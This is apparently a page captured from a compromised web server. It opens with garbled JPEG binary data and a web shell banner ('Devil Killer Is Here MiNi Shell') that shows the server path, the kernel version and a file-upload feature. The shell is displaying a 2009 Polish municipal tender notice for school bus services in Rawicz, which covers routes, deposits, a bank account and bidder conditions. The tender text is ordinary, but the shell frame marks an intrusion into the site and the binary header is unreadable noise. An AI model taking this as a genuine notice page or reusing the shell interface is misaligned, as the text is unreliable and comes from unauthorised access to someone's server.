JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090520/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090520/157794-N-2009.html

<p class="kh_header"><b>Rawicz: Dowozy dzieci szkolnych do placówek oświatowych na terenie miasta i gminy Rawicz w roku szkolnym 2009 / 2010</b><br>
<b>Numer ogłoszenia: 157794 - 2009; data zamieszczenia: 20.05.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Burmistrz Gminy Rawicz działający w imieniu Gminy Rawicz , ul. Piłsudskiego 21, 63-900 Rawicz, woj. wielkopolskie, tel. 065 5465400, faks 065 5464167.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.rawicz.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dowozy dzieci szkolnych do placówek oświatowych na terenie miasta i gminy Rawicz w roku szkolnym 2009 / 2010.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci szkół podstawowych i  gimnazjalnych  do niżej podanych placówek oświatowych  na terenie miasta i gminy Rawicz wraz z odwiezieniem tych dzieci do miejsca ich zamieszkania w oparciu o podany w SIWZ harmonogram dowozu i odwozu określający ilość kursów, długość trasy oraz ilość dzieci i tak :Szkoła Podstawowa Nr 4 w Rawiczu ul. Broniewskiego 5,  Szkoła Podstawowa Nr 5 w Rawiczu ul. Szkolna 3,  Szkoła Podstawowa we wsi Zielona Wieś, Zielona Wieś 72,  Gimnazjum Nr 1 w Rawiczu ul. Szarych Szeregów 3, Gimnazjum w Sierakowie ul. Przyjemskiego 35, Zespół Szkół Specjalnych w Rawiczu ul. G. Roweckiego 9f. 
W ramach niniejszego zamówienia Wykonawca zapewnia stałą opieke nad dziećmi. 
Na podstawie podanego planu dowozu i odwozu uczniów szkół podstawowych i gimnazjalnych na terenie gminy Rawicz  w roku szkolnym  2009/2010  ustalono ilość wozokilometrów na około 1.932,90 km za pełen tydzień, 386,58 km średnia dzienna obliczona na podstawie pełnego tygodnia  - przewozy czynne -  z dziećmi, za które Zamawiający ponosi koszty.  
Poniżej podano ilość wozokilometrów (za pełen tydzień) dla każdego pakietu - zakresu osobno ponieważ Zamawiający dopuszcza możliwość składania ofert częściowych na podane niżej zakresy: Pakiet I -  305,4  km,  Pakiet II - 630,0  km,   Pakiet III   -   203,0 km, Pakiet IVA - .200,0 km ,  Pakiet IVB - 120,0 km,
Pakiet IVC - 229,5 km, Pakiet IVD -  245,0 km..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 7.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 18.06.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> 1.Każdy WYKONAWCA  przystępujący do przetargu jest obowiązany wnieść wadium w wysokości ustalonej dla danego pakietu na który składa ofertę i tak:
a)  PAKIET I 	-  2.800,00 PLN   
b)  PAKIET II	-  2.200,00 PLN   
c)  PAKIET III	-  1.600,00 PLN  
d) PAKIET IVA      -  1.000,00 PLN  
e) PAKIET IVB      -  1.400,00 PLN 
f)  PAKIET IVC     -      800,00 PLN 
g) PAKIET IVD     -   1.300,00 PLN 
2. Wadium  musi obejmować cały okres związania ofertą i może być wniesione:  w pieniądzu,  poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, gwarancjach  bankowych, gwarancjach ubezpieczeniowych, poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9.11. 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
3.W przypadku wyboru wpłaty wadium  w pieniądzu należy je wnieść przelewem na rachunek bankowy Urzędu Miejskiego Gminy Rawicz  w Kredyt Bank S.A. Odział Rawicz 43 1500 2110 1215 1002 0897 0000. Wydanie polecenia przelewu nie jest jednoznaczne z wniesieniem, dokonaniem zapłaty określonej kwoty wadium.         
O uznaniu przez Zamawiającego, że wadium w pieniądzu wpłacono  w wymaganym terminie, decyduje data i godzina wpływu środków na wskazany wyżej  rachunek Zamawiającego<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się WYKONAWCY, którzy spełniają niżej określone warunki:

WARUNKI  DO SPEŁNIENIA PRZEZ WYKONAWCÓW

  1) - spełniają warunki określone w art. 22 ust. 1 ustawy PZP i nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy tj.

a) posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (art. 22 ust. 1 pkt 1 ustawy);
b) posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania zamówienia lub przedstawią pisemne zobowiązanie innych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia  (art. 22 ust. 1 pkt 2 ustawy); 
c) znajdują się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (art. 22 ust. 1 pkt 3 ustawy);
d) nie podlegają wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP (art. 22 ust. 1 pkt 4  i art. 24 ustawy);

2) są  ubezpieczeni  od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej,   

3) świadczyli  usługi związane z przewozem osób. Warunek zostanie uznany za spełniony jeżeli Wykonawca udokumentuje świadczenie  usług przewozu osób w ilości co najmniej 2 zamówień o wielkości odpowiadającej pakietowi na który składa ofertę.   

4) akceptują bez zastrzeżeń warunki zamówienia określone w niniejszej SIWZ oraz w projekcie umowy. 

ZAMAWIAJĄCY dokona oceny spełnienia warunków na podstawie złożonych wraz z ofertą oświadczeń, dokumentów, wykazów szczegółowo określonych w niniejszej SIWZ. Ocena spełnienia tych warunków dokonana zostanie wg formuły spełnia - nie spełnia w oparciu o informacje zawarte w załączonych dokumentach. Z treści załączonych dokumentów musi wynikać jednoznacznie, iż postawione warunki WYKONAWCA spełnia. 
Nie spełnienie chociażby jednego z w/wym. warunków skutkować będzie wykluczeniem Wykonawcy z postępowania, a oferta będzie podlegała odrzuceniu.
WYKONAWCY wspólnie ubiegający się o udzielenie niniejszego zamówienia muszą wykazać, że łącznie spełniają w/wym. warunki. Przy ocenie spełnienia warunków udziału w postępowaniu,  warunki i wielkości wykazane przez podmioty 
występujące wspólnie będą brane pod uwagę łącznie.  Nie spełnienie powyższego wymagania spowoduje wykluczenie WYKONAWCY - konsorcjum..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 1. W celu potwierdzenia spełnienia warunków, o których mowa w rozdziale VIII ZAMAWIAJĄCY żąda do złożenia przez WYKONAWCĘ, w formie oryginału lub kserokopii poświadczonej za zgodność z oryginałem przez WYKONAWCĘ, następujących dokumentów:

w celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności o którym mowa w art. 22 ust. 1 oraz nie podlega wykluczeniu na podstawie art. 24 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (warunek nr 1): 

1) Oświadczenie WYKONAWCY, że posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień (załącznik nr 2);

2) Oświadczenie WYKONAWCY, że posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym i osobami zdolnymi do wykonania zamówienia  lub przedstawi pisemne zobowiązanie innych podmiotów do udostępniania  potencjału technicznego i osób zdolnych do wykonania zamówienia  (załącznik nr 2); 

w przypadku korzystania z potencjału innych podmiotów, pisemne zobowiązanie tych podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania zamówienia ;

3) Oświadczenie WYKONAWCY, że znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (załącznik nr 2); 

4) Oświadczenie WYKONAWCY, że nie podlega wykluczeniu z postępowania o udzielenie zamówienia na podstawie art. 24 ustawy PZP (załącznik nr 3);

5) aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawiony nie  wcześniej niż 6 miesięcy przed upływem terminu składania ofert, 

Zamawiający nie dopuszcza możliwości składania odpisu lub zaświadczeń o wpisie do ewidencji działalności gospodarczej  wystawionych  w okresie wcześniejszym niż podano wyżej nawet jeżeli organ wydający potwierdzi ich aktualność. 


6) aktualną licencję na wykonywanie krajowego transportu drogowego osób,

7) aktualną informację z Krajowego Rejestru Karnego w zakresie  określonym w art. 24 ust. 1 pkt 4-8 ustawy,  wystawiona nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.                                                                                                                                                                              
8) aktualną informację z Krajowego Rejestru Karnego potwierdzającą, że nie orzeczono wobec podmiotu zbiorowego zakazu ubiegania się o udzielenie zamówienia na podstawie przepisów o odpowiedzialności podmiotów zbiorowych za 
czyny zabronione pod groźbą kary (w zakresie określonym w art. 24 ust. 1 pkt 9 ustawy)  wystawioną nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;

9) aktualne zaświadczenia właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie 
zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

w celu potwierdzenia,  że Wykonawca znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia (warunek nr 2 )  : 

10) aktualną polisę, a w przypadku jej braku inny dokument potwierdzający, że WYKONAWCA jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej, 

w celu potwierdzenia, że Wykonawca posiada niezbędną wiedzę i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania zamówienia w celu potwierdzenia warunku nr 3 wykonawca składa : 

11) wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych usług w okresie ostatnich trzech lat przed dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności  jest krótszy - w tym okresie, odpowiadających usługom stanowiącym przedmiot zamówienia - potwierdzający spełnienie warunku nr 3 opisanego przez Zamawiającego, z podaniem ich wartości, przedmiotu- zakresu rzeczowego, dat wykonania i odbiorców, oraz załączenia dokumentów potwierdzających, że te usługi zostały wykonane należycie (załącznik nr  5), 

Przedłożony do oferty Wykaz przygotowany przez Wykonawcę w oparciu o załączony do SIWZ  formularz oraz dołączone do wykazu inne dokumenty (np. referencje)  muszą łącznie potwierdzić, że Wykonawca spełnia warunek nr 3 opisany przez Zamawiającego wyżej.  
Załączone do wykazu  dokumenty muszą również potwierdzać, że opisane w wykazie usługi potwierdzające spełnienie tego warunku,  zostały przez Wykonawcę  wykonane należycie.

12) Oświadczenie Wykonawcy potwierdzające, że dysponuje odpowiednim taborem - autobusami oraz osobami zdolnymi do realizacji zamówienia (załącznik nr 6 ) 
w celu potwierdzenia, że  Wykonawca akceptuje bez zastrzeżeń warunki zamówienia określone w niniejszej SIWZ oraz w projekcie umowy (warunek nr 4) 

13) Oświadczenie Wykonawcy, że zapoznał się ze SIWZ a w szczególności z warunkami opisu przedmiotu zamówieniai akceptuje bez zastrzeżeń warunki zamówienia określone w Specyfikacji oraz w projekcie umowy, oraz zdobył konieczne informacje do przygotowania oferty (załącznik nr 4) 

Ponadto dokumentami wymaganymi  do złożenia przez WYKONAWCĘ  są:

14) Oferta przetargowa (załącznik do SIWZ) 
15) Oryginał pełnomocnictwa do reprezentowania ( o ile ofertę składa pełnomocnik)  lub kopia pełnomocnictwa poświadczona przez notariusza. 
16) dowód wpłaty wadium (kopia potwierdzona za zgodność z oryginałem)   
17) Kalkulacje stawki wozokilometra dla poszczególnych pakietów z uwzględnieniem zapisów  rozdziału XVI  oraz opisu przedmiotu zamówienia.
UWAGA : Kalkulując stawkę wozokilometra należy pamiętać, że Zamawiający płaci wyłącznie za wykonane kilometry czynne (przewozy z dziećmi). Do kalkulacji należy jednak  przyjąć przebiegi puste tj. dojazdy  i odjazdy  do miejsca rozpoczęcia i zakończenia pracy oraz przebiegi z dziećmi.  
18) WYKONAWCY, którzy zamierzają powierzyć część zamówienia podwykonawcom zobowiązani są w treści oferty lub w załączniku do oferty (załącznik nr 5) wskazać tą część zamówienia, których wykonanie powierzy podwykonawcom.

2. Jeżeli WYKONAWCA ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w § 1 ust. 1 Rozporządzenia Prezesa Rady Ministrów z dnia 19 maja 2006 r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane:
1) pkt 2, 3 i 5 - składa dokument lub dokumenty, wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że:
a) nie otwarto jego likwidacji ani nie ogłoszono upadłości,
b) nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu,
c) nie orzeczono wobec niego zakazu ubiegania się o zamówienie;

2) pkt 4 - składa zaświadczenie właściwego organu sądowego lub administracyjnego kraju pochodzenia albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy.

Dokumenty, o których mowa w ppkt 1 lit. a i c oraz ppkt 2, powinny być wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. Dokument, o którym mowa w ppkt 1 lit. b, powinien być wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału postępowaniu o udzielenie zamówienia albo składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentów, o których mowa w ppkt 1 i 2, zastępuje się je dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania. Przepis ust. 2 stosuje się odpowiednio.
Dokumenty sporządzone w języku obcym są składane wraz z tłumaczeniem na język polski, poświadczonym przez wykonawcę
3.Zasady składania oferty przez podmioty występujące wspólnie i sposób komunikowania się :
a) podmioty zobowiązane są do złożenia wraz z ofertą pełnomocnictwa do reprezentowania wszystkich WYKONAWCÓW wspólnie ubiegających się o udzielenie zamówienia,
b) pełnomocnik konsorcjum pozostaje w kontakcie z Zamawiającym w toku postępowania: zwraca się do Zamawiającego z wszelkimi sprawami i do niego Zamawiający kieruje informacje, korespondencję itp. 
c) każdy z wykonawców działających wspólnie powinien złożyć wszelkie dokumenty potwierdzające spełnienie warunków udziału w postępowaniu. Wymagane oświadczenia i dokumenty wskazane w pkt 1 ppkt  4-10  tego rozdziału powinny być złożone przez każdy podmiot osobno, natomiast pozostałe oświadczenia i dokumenty mogą być złożone razem.    

4. Wykonawcy zobowiązani są do przedstawienia dokumentów - oświadczeń o których wyżej mowa zawierających stwierdzenia zgodne z faktami i stanem prawnym istniejącym w chwili ich składania (aktualne dane).
Dokumenty o których wyżej mowa mogą ( za wyjątkiem pełnomocnictwa, - rozdział XIV pkt 7 SIWZ)  potwierdzające spełnienie wymaganych warunków mogą być złożone w formie oryginału lub kserokopii  poświadczonej za zgodność z oryginałem przez Wykonawcę.  
Zakres i forma ww. dokumentów musi być zgodna z Rozporządzeniem Prezesa Rady Ministrów z dn. 19.05.06r. w sprawie rodzajów dokumentów, jakich może żądać zamawiający od wykonawcy oraz form, w jakich te dokumenty mogą być składane    (Dz. U. Nr 87 poz. 605 ze zmianami)..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.rawicz.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> w siedzibie Zamawiającego: Urząd Miejski Gminy Rawicz ul. Piłsudskiego 21 pok. 111, 63-900 Rawicz - po zapłaceniu należności w kasie Urzędu (20 PLN) lub za zaliczeniem pocztowym..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.06.2009 godzina 10:00, miejsce: w siedzibie Zamawiającego - w sekretariacie Urzędu Miejskiego Gminy Rawicz, 63-900 Rawicz ul. Piłsudskiego 21 pokój nr 6..</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p><b>IV.3.13) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> 1. Zadanie nie jest finansowane ze środków Unii Europejskiej. 2. Wszelkie oświadczenia, wnioski, zawiadomienia oraz informacje w postępowaniu o udzielenie zamówienia ZAMAWIAJĄCY i WYKONAWCY przekazują pisemnie lub za pomocą faksu, z zastrzeżeniem protestu, który składa się wyłącznie w formie pisemnej na adres ZAMAWIAJĄCEGO. Złożenie protestu w innej formie nie wywołuje jakichkolwiek skutków prawnych. 3. Jeżeli ZAMAWIAJĄCY lub WYKONAWCA przekaże faksem dokumenty lub informacje, o których mowa wyżej, każda ze stron na żądanie drugiej niezwłocznie potwierdzi fakt ich otrzymania. 4. Zamawiający dopuszcza możliwość porozumiewania się z Wykonawcą za pomocą poczty elektronicznej. 5. Zamawiający nie przewiduje zawarcia umowy ramowej. 6. Zamawiający nie zamierza ustanowić dynamicznego systemu zakupów. 
7. Istotne dla stron postanowienia zostały określone w projekcie umowy stanowiącym załącznik do specyfikacji. 
8. Zmiana postanowień zawartej umowy może nastąpić za zgodą obu stron wyrażoną na piśmie pod rygorem nieważności takiej zmiany.
9.Zakazuje się  zmian postanowień  zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, chyba że Zamawiający przewidział możliwość  dokonania takiej zmiany  w ogłoszeniu o zamówieniu lub SIWZ  oraz określił  warunki takiej zmiany. 
10. Zamawiający dopuszcza - jeżeli uzna za uzasadnione - możliwość zmiany ustaleń zawartej umowy w stosunku do treści oferty Wykonawcy o których mowa w art. 144 ustawy PZP w następujących przypadkach :

1) potrzeby wykonania usług  zamiennych lub odstąpienia od realizacji części usług i związanej z tym zmiany wynagrodzenia na wniosek Zamawiającego,
2) wystąpienia usług  dodatkowych, których wykonanie uzależnia wykonanie zamówienia podstawowego,      
3) na uzasadniony wniosek Wykonawcy-Przewoźnika zaakceptowany przez Zamawiającego i pod warunkiem, że zmiana ta wynika z okoliczności których nie można było przewidzieć  na etapie składania oferty i nie jest przez niego zawiniona, 
4) wystąpienia zdarzeń wymuszających przerwę w realizacji zamówienia niezależnych od Wykonawcy,  
5) zmiany w harmonogramie dowozu i odwozu    
6) wprowadzenie lub zmiana zgłoszonych w ofercie części usług wykonywanych przy udziale Podwykonawcy, za uprzednią zgodą Zamawiającego,  
7) zmiana terminu realizacji zamówienia, 
8) przekształcenie którejkolwiek ze stron umowy,
9) zmiany personelu Wykonawcy i Zamawiającego, za uprzednią zgodą Zamawiającego (np. osoby odpowiedzialne za  realizację zamówienia itp.)
10) warunków płatności z zastrzeżeniem, że zmiana ta będzie korzystna dla Zamawiającego,
11) innych niezbędnych zmian pod warunkiem, że są korzystne dla Zamawiającego..</p><p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Dowóz dzieci do SP nr 4 i Gimnazjum nr 1 w Rawiczu - PAKIET I.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamowienie obejmuje uslugi związane z dowodem dzieci do szkołyt Podstawowej nr 4 oraz Gimnazjum nr 1 w Rawiczu wraz z odwiezieniem  tych dzieci do miejsca ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się bedzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziećmi) w ciągu tygodnia wynosi 305,40 wzkm, ilość dzieci 219.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Dowóz dzieci do SP nr 5 w Rawiczu - PAKIET II.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Zamówienie obejmuje usługi związane z dowozem dzieci do Szkoły Podstawowej nr 5 w Rawiczu wraz z odwiezieniem tych dzieci do miejsce ich zamieszkania oraz zapewnieniem stałej opieki nad dziecmi. Przewóz dzieci odbywać się będzie wg ustalonych tras. Ilość wozokilometrów czynnych (przebiegi z dziecmi) w ciągu tygodnia wynosi 630 wzkm, ilość dzieci 156.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 60.10.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 18.06.2010.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Dowóz dzieci do SP w Zielonej Wsi - PAKIET III.</p>
